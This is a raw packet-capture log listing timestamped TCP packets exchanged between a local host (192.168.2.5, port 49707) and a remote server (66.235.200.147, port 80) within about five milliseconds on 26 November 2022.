Nov 26, 2022 11:17:40.093446016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093463898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093482018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093498945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093585014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093602896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093622923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093640089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093657017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093674898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093693018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093709946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093727112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093744040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093761921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093779087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093786955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093786955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093803883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093822956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093831062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093846083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093864918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093883038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093899965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093918085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093935013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093947887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093957901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093971968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.093985081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.093997955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094007969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094028950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094048023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094064951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094082117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094099045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094115973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094135046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094140053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094157934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094172955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094182014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094198942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094209909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094228983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094247103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094264030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094280958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094315052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094331026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094347000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094364882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094382048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094399929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094417095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094428062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094450951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094475031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094563007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094580889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094599009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094616890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094634056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094654083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094657898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094671965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094686031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094696045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.094767094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094784975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094803095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094820976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094844103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094862938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094897985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094918966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094937086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094955921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094973087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.094991922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095009089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095025063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095041990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095060110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095077991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095094919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095113039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095129967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095149994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095153093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095171928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095180988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095201969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095208883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095231056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095248938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095254898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095277071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095293999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095300913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095321894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095340967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095355988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095365047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095383883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095391035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095413923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095432997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095447063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095458031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095469952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095484018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095505953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095525026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095530987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095549107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095567942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095571041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095612049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095614910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095637083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095655918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095678091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095679045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095704079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095720053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095730066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095752954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095772982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095777035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095801115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095818996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095824957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095845938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095868111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095870972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095892906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095910072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095918894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095942020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095962048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.095968008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.095989943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096009970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096014023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096038103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096060991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096076012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096096039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096117020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096127987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096148968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096165895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096173048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096194983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096214056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096216917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096236944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096256018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096273899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096282959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096299887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096299887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096323013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096343994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096349001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096370935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096390009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096395016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096417904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096445084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096451998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096470118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096482038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096496105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096515894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096535921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096538067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096560955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096573114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096585035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096626997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096643925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096649885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096672058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096683025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096698046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096715927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096734047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096738100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096760035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096781969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096796036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096815109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096833944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096837997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096858978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096877098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096880913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096901894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096921921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096923113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096945047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096960068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.096967936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.096990108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097003937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097014904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097034931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097050905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097055912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097076893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097091913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097099066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097119093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097137928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097138882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097161055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097179890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097182035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097203970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097218990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097227097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097248077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097266912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097270012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097290993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097307920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097315073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097333908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097349882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097357035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097376108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097394943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097398996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097418070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097436905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097439051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097460985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097475052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097484112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097502947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097533941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097533941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097557068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097572088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097579956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097601891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097616911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097624063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097645998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097661972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097667933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097687960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097702980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097709894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097728968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097744942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097749949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097769976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097786903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097791910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097811937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097831011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097832918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097872019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097888947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097892046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097913980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097929955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097934961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097955942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097973108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.097976923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.097999096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098016977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098021030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098041058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098054886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098066092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098086119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098104954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098109007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098131895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098148108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098154068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098175049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098190069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098197937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098217964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098237038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098239899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098261118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098277092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098284006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098305941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098321915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098328114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098349094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098367929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098368883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098391056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098403931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098416090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098434925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098450899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098455906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098476887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098489046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098500967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098520994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098536015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098542929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098563910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098578930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098586082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098607063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098619938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098629951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098649979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098665953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098673105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098695993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098710060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098720074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098740101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098758936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098761082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098789930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098808050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098813057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098834038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098854065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098856926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098893881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098896027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098918915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098936081 CET	80	49707	66.235.200.147	192.168.2.5
